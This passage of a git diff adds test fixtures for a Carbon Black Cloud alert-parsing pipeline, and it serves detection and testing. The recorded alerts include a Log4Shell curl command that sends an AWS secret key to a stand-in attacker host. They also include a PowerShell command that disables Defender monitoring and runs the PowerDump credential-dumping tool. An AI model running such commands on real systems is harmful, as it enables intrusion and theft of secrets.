"is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "netconn": { + "local_ip": "10.203.105.21", + "local_ipv4": "10.203.105.21", + "local_port": 49233, + "remote_domain": "google.com", + "remote_ip": "81.2.69.142", + "remote_ipv4": "81.2.69.142", + "remote_port": 80 + }, + "organization_key": "ABCD1234", + "parent": { + "cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\" ", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a", + "hash": { + "md5": "8a2122e8162dbef04694b9c3e0b6cdee", + "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450" + }, + "name": "c:\\windows\\system32\\cmd.exe", + "pid": 8796, + "reputation": "TRUSTED_WHITE_LIST", + "username": "DEV01-39X-1\\bit9qa" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "21AB6B27-9F72-11ED-A79A-005056A53F17", + "process": { + "cmdline": "curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0", + "hash": { + "md5": "eac53ddafb5cc9e780a7cc086ce7b2b1", + "sha256": "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\curl.exe", + "pid": 5780, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "DEV01-39X-1\\bit9qa" + }, + "reason_code": "DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857", + "rule_category_id": "DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D", + "rule_id": "B5974D4D-265E-4FAF-8F71-2F76AAD67857", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017", + "threat_name": "CVE-2021-44228 Exploit", + "tms_rule_id": "4b98443a-ba0d-4ff5-b99e-e5e70432a214", + "type": "INTRUSION_DETECTION_SYSTEM", + "url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-02-03T17:27:33.007Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-03T17:22:03.945Z", + "id": "ca316d99-a808-3779-8aab-62b2b6d9541c", + "kind": "alert", + "original": "{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c\",\"id\":\"ca316d99-a808-3779-8aab-62b2b6d9541c\",\"type\":\"INTRUSION_DETECTION_SYSTEM\",\"is_updated\":false,\"detection_timestamp\":\"2023-02-03T17:22:03.945Z\",\"first_event_timestamp\":\"2023-02-03T17:22:03.945Z\",\"last_event_timestamp\":\"2023-02-03T17:22:03.945Z\",\"severity\":1,\"reason\":\"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21\",\"threat_id\":\"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017\",\"primary_event_id\":\"21AB6B27-9F72-11ED-A79A-005056A53F17\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-02-03T17:27:33.007Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"rule_category_id\":\"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D\",\"rule_id\":\"B5974D4D-265E-4FAF-8F71-2F76AAD67857\",\"reason_code\":\"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MEDIUM\",\"device_policy_id\":165700,\"device_policy\":\"Standard\",\"device_id\":17482451,\"device_name\":\"DEV01-39X-1\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_username\":\"DemoMachine\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"66.170.99.2\",\"device_internal_ip\":\"10.203.105.21\",\"netconn_remote_port\":80,\"netconn_local_port\":49233,\"netconn_remote_domain\":\"google.com\",\"netconn_remote_ip\":\"81.2.69.142\",\"netconn_local_ip\":\"10.203.105.21\",\"netconn_remote_ipv4\":\"81.2.69.142\",\"netconn_local_ipv4\":\"10.203.105.21\",\"attack_tactic\":\"TA0001\",\"attack_technique\":\"T1190\",\"tms_rule_id\":\"4b98443a-ba0d-4ff5-b99e-e5e70432a214\",\"threat_name\":\"CVE-2021-44228 Exploit\",\"process_guid\":\"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0\",\"process_pid\":5780,\"process_name\":\"c:\\\\windows\\\\system32\\\\curl.exe\",\"process_sha256\":\"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4\",\"process_md5\":\"eac53ddafb5cc9e780a7cc086ce7b2b1\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"curl -H \\\"Host: \\\\${jndi:ldap://\\\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\\\" http://google.com/testingids\",\"process_username\":\"DEV01-39X-1\\\\bit9qa\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft Windows\"],\"parent_guid\":\"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a\",\"parent_pid\":8796,\"parent_name\":\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"parent_sha256\":\"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450\",\"parent_md5\":\"8a2122e8162dbef04694b9c3e0b6cdee\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"parent_username\":\"DEV01-39X-1\\\\bit9qa\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21", + "severity": 1, + "start": "2023-02-03T17:22:03.945Z" + }, + "host": { + "hostname": "DEV01-39X-1", + "id": "17482451", + "name": "DEV01-39X-1", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "process": { + "command_line": "curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids", + "entity_id": "ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0", + "executable": "c:\\windows\\system32\\curl.exe", + "hash": { + "md5": "eac53ddafb5cc9e780a7cc086ce7b2b1", + "sha256": "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4" + }, + "name": "curl.exe", + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" ", + "entity_id": "ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "md5": "8a2122e8162dbef04694b9c3e0b6cdee", + "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450" + }, + "name": "cmd.exe", + "pid": 8796 + }, + "pid": 5780 + }, + "related": { + "hash": [ + "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", + "8a2122e8162dbef04694b9c3e0b6cdee", + "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4", + "eac53ddafb5cc9e780a7cc086ce7b2b1" + ], + "hosts": [ + "DEV01-39X-1" + ], + "user": [ + "DemoMachine" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "DemoMachine" + } + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log new file mode 100644 index 00000000000..c0e7a94eb97 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log @@ -0,0 +1,2 @@ +{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234","id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1","type":"CB_ANALYTICS","backend_timestamp":"2023-07-17T17:16:50.960Z","user_update_timestamp":null,"backend_update_timestamp":"2023-07-17T17:29:19.996Z","detection_timestamp":"2023-07-17T17:15:51.708Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:27:59.192Z","severity":5,"reason":"A known virus (HackTool: Powerpuff) was detected running.","reason_code":"T_REP_VIRUS","threat_id":"9e0afc389c1acc43b382b1ba590498d2","primary_event_id":"94953e4524c511ee86284f0541a5184d","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-07-17T17:16:50.960Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-07-17T17:16:50.960Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":true,"device_id":6948863,"device_name":"demodevice","device_uem_id":"","device_target_value":"MISSION_CRITICAL","device_policy":"SSQ_Policy","device_policy_id":112221,"device_os":"WINDOWS","device_os_version":"Windows Server 2019 x64","device_username":"sample@demoorg.com","device_location":"OFFSITE","device_external_ip":"1.2.3.4","device_internal_ip":"4.3.2.1","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"ttps":["MALWARE_APP","RUN_MALWARE_APP","MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER","FILELESS","MITRE_T1059_001_POWERSHELL"],"attack_tactic":"","attack_technique":"","process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73","process_pid":3600,"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1","process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0","process_md5":"42a80cc2333b612b63a859f17474c9af","process_effective_reputation":"KNOWN_MALWARE","process_reputation":"KNOWN_MALWARE","process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}","process_username":"demodevice\\Administrator","process_issuer":[],"process_publisher":[],"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed","parent_pid":4024,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"","parent_username":"demodevice\\Administrator","childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000","childproc_name":"","childproc_sha256":"","childproc_md5":"","childproc_effective_reputation":"RESOLVING","childproc_username":"demodevice\\Administrator","childproc_cmdline":""} +{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1","id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1","type":"CB_ANALYTICS","is_updated":true,"detection_timestamp":"2023-07-17T17:15:51.708Z","backend_timestamp":"2023-07-17T17:16:50.960Z","backend_update_timestamp":"2023-07-17T17:18:03.397Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:15:33.396Z","severity":5,"reason":"A known virus (HackTool: Powerpuff) was detected running.","threat_id":"9e0afc389c1acc43b382b1ba590498d2","primary_event_id":"94953e4524c511ee86284f0541a5184d","workflow":{"status":"OPEN","change_timestamp":"2023-07-17T17:16:50.960Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"determination":{"value":"NONE","change_timestamp":"2023-07-17T17:16:50.960Z"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","reason_code":"T_REP_VIRUS","sensor_action":"ALLOW","device_target_value":"MISSION_CRITICAL","device_policy_id":112221,"device_policy":"SSQ_Policy","device_id":6948863,"device_name":"Kognos-W19-CB-3","device_os":"WINDOWS","device_os_version":"Windows Server 2019 x64","device_username":"demouser@demo.org","device_location":"OFFSITE","device_external_ip":"34.234.170.45","device_internal_ip":"10.0.14.120","ttps":["FILELESS","MALWARE_APP","MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER","MITRE_T1059_001_POWERSHELL","RUN_MALWARE_APP"],"attack_tactic":"TA0002","process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73","process_pid":3600,"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1","process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0","process_md5":"42a80cc2333b612b63a859f17474c9af","process_reputation":"KNOWN_MALWARE","process_effective_reputation":"KNOWN_MALWARE","process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}","process_username":"KOGNOS-W19-CB-3\\Administrator","parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed","parent_pid":4024,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_reputation":"TRUSTED_WHITE_LIST","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_username":"KOGNOS-W19-CB-3\\Administrator","childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000","childproc_effective_reputation":"RESOLVING","childproc_username":"KOGNOS-W19-CB-3\\Administrator","blocked_effective_reputation":"RESOLVING","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json new file mode 100644 index 00000000000..dc7b40c48f8 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log-expected.json @@ -0,0 +1,293 @@ +{ + "expected": [ + { + "@timestamp": "2023-07-17T17:15:51.708Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-07-17T17:16:50.960Z", + "backend_update_timestamp": "2023-07-17T17:29:19.996Z", + "category": "THREAT", + "childproc": { + "effective_reputation": "RESOLVING", + "guid": "ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000", + "username": "demodevice\\Administrator" + }, + "determination": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "value": "NONE" + }, + "device": { + "external_ip": "1.2.3.4", + "internal_ip": "4.3.2.1", + "location": "OFFSITE", + "os": "WINDOWS", + "policy": "SSQ_Policy", + "policy_id": 112221, + "target_value": "MISSION_CRITICAL" + }, + "is_updated": true, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "organization_key": "ABCD1234", + "parent": { + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 4024, + "reputation": "TRUSTED_WHITE_LIST", + "username": "demodevice\\Administrator" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "94953e4524c511ee86284f0541a5184d", + "process": { + "cmdline": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "effective_reputation": "KNOWN_MALWARE", + "guid": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "pid": 3600, + "reputation": "KNOWN_MALWARE", + "username": "demodevice\\Administrator" + }, + "reason_code": "T_REP_VIRUS", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "9e0afc389c1acc43b382b1ba590498d2", + "threat_notes_present": false, + "ttps": [ + "MALWARE_APP", + "RUN_MALWARE_APP", + "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER", + "FILELESS", + "MITRE_T1059_001_POWERSHELL" + ], + "type": "CB_ANALYTICS", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234", + "workflow": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:27:59.192Z", + "id": "411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234\",\"id\":\"411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"type\":\"CB_ANALYTICS\",\"backend_timestamp\":\"2023-07-17T17:16:50.960Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2023-07-17T17:29:19.996Z\",\"detection_timestamp\":\"2023-07-17T17:15:51.708Z\",\"first_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"last_event_timestamp\":\"2023-07-17T17:27:59.192Z\",\"severity\":5,\"reason\":\"A known virus (HackTool: Powerpuff) was detected running.\",\"reason_code\":\"T_REP_VIRUS\",\"threat_id\":\"9e0afc389c1acc43b382b1ba590498d2\",\"primary_event_id\":\"94953e4524c511ee86284f0541a5184d\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"value\":\"NONE\",\"changed_by_type\":null,\"changed_by\":null},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":true,\"device_id\":6948863,\"device_name\":\"demodevice\",\"device_uem_id\":\"\",\"device_target_value\":\"MISSION_CRITICAL\",\"device_policy\":\"SSQ_Policy\",\"device_policy_id\":112221,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows Server 2019 x64\",\"device_username\":\"sample@demoorg.com\",\"device_location\":\"OFFSITE\",\"device_external_ip\":\"1.2.3.4\",\"device_internal_ip\":\"4.3.2.1\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ttps\":[\"MALWARE_APP\",\"RUN_MALWARE_APP\",\"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER\",\"FILELESS\",\"MITRE_T1059_001_POWERSHELL\"],\"attack_tactic\":\"\",\"attack_technique\":\"\",\"process_guid\":\"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73\",\"process_pid\":3600,\"process_name\":\"c:\\\\users\\\\administrator\\\\appdata\\\\local\\\\temp\\\\powerdump.ps1\",\"process_sha256\":\"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0\",\"process_md5\":\"42a80cc2333b612b63a859f17474c9af\",\"process_effective_reputation\":\"KNOWN_MALWARE\",\"process_reputation\":\"KNOWN_MALWARE\",\"process_cmdline\":\"\\\"powershell.exe\\\" & {Write-Host \\\\\\\"\\\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\\\\\"\\\" -fore green\\nImport-Module \\\\\\\"\\\"$Env:Temp\\\\PowerDump.ps1\\\\\\\"\\\"\\nInvoke-PowerDump}\",\"process_username\":\"demodevice\\\\Administrator\",\"process_issuer\":[],\"process_publisher\":[],\"parent_guid\":\"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed\",\"parent_pid\":4024,\"parent_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"\",\"parent_username\":\"demodevice\\\\Administrator\",\"childproc_guid\":\"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000\",\"childproc_name\":\"\",\"childproc_sha256\":\"\",\"childproc_md5\":\"\",\"childproc_effective_reputation\":\"RESOLVING\",\"childproc_username\":\"demodevice\\\\Administrator\",\"childproc_cmdline\":\"\"}", + "reason": "A known virus (HackTool: Powerpuff) was detected running.", + "severity": 5, + "start": "2023-07-17T17:15:33.396Z" + }, + "host": { + "hostname": "demodevice", + "id": "6948863", + "name": "demodevice", + "os": { + "type": "windows", + "version": "Windows Server 2019 x64" + } + }, + "process": { + "command_line": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "entity_id": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "executable": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "powerdump.ps1", + "parent": { + "entity_id": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "powershell.exe", + "pid": 4024 + }, + "pid": 3600 + }, + "related": { + "hash": [ + "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", + "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0", + "42a80cc2333b612b63a859f17474c9af" + ], + "hosts": [ + "demodevice" + ], + "user": [ + "sample@demoorg.com" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "sample@demoorg.com" + } + }, + { + "@timestamp": "2023-07-17T17:15:51.708Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "attack_tactic": "TA0002", + "backend_timestamp": "2023-07-17T17:16:50.960Z", + "backend_update_timestamp": "2023-07-17T17:18:03.397Z", + "blocked_process": { + "effective_reputation": "RESOLVING" + }, + "category": "THREAT", + "childproc": { + "effective_reputation": "RESOLVING", + "guid": "ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "determination": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "value": "NONE" + }, + "device": { + "external_ip": "34.234.170.45", + "internal_ip": "10.0.14.120", + "location": "OFFSITE", + "os": "WINDOWS", + "policy": "SSQ_Policy", + "policy_id": 112221, + "target_value": "MISSION_CRITICAL" + }, + "is_updated": true, + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "organization_key": "ABCD1234", + "parent": { + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed", + "hash": { + "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" + }, + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 4024, + "reputation": "TRUSTED_WHITE_LIST", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "94953e4524c511ee86284f0541a5184d", + "process": { + "cmdline": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}", + "effective_reputation": "KNOWN_MALWARE", + "guid": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73", + "hash": { + "md5": "42a80cc2333b612b63a859f17474c9af", + "sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0" + }, + "name": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1", + "pid": 3600, + "reputation": "KNOWN_MALWARE", + "username": "KOGNOS-W19-CB-3\\Administrator" + }, + "reason_code": "T_REP_VIRUS", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "9e0afc389c1acc43b382b1ba590498d2", + "ttps": [ + "FILELESS", + "MALWARE_APP", + "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER", + "MITRE_T1059_001_POWERSHELL", + "RUN_MALWARE_APP" + ], + "type": "CB_ANALYTICS", + "url": "https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-07-17T17:16:50.960Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:15:33.396Z", + "id": "411eedfc-8408-2f9e-59f2-a83dfaae0ec1", + "kind": "alert", + "original": "{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"id\":\"411eedfc-8408-2f9e-59f2-a83dfaae0ec1\",\"type\":\"CB_ANALYTICS\",\"is_updated\":true,\"detection_timestamp\":\"2023-07-17T17:15:51.708Z\",\"backend_timestamp\":\"2023-07-17T17:16:50.960Z\",\"backend_update_timestamp\":\"2023-07-17T17:18:03.397Z\",\"first_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"last_event_timestamp\":\"2023-07-17T17:15:33.396Z\",\"severity\":5,\"reason\":\"A known virus (HackTool: Powerpuff) was detected running.\",\"threat_id\":\"9e0afc389c1acc43b382b1ba590498d2\",\"primary_event_id\":\"94953e4524c511ee86284f0541a5184d\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-07-17T17:16:50.960Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"determination\":{\"value\":\"NONE\",\"change_timestamp\":\"2023-07-17T17:16:50.960Z\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"reason_code\":\"T_REP_VIRUS\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MISSION_CRITICAL\",\"device_policy_id\":112221,\"device_policy\":\"SSQ_Policy\",\"device_id\":6948863,\"device_name\":\"Kognos-W19-CB-3\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows Server 2019 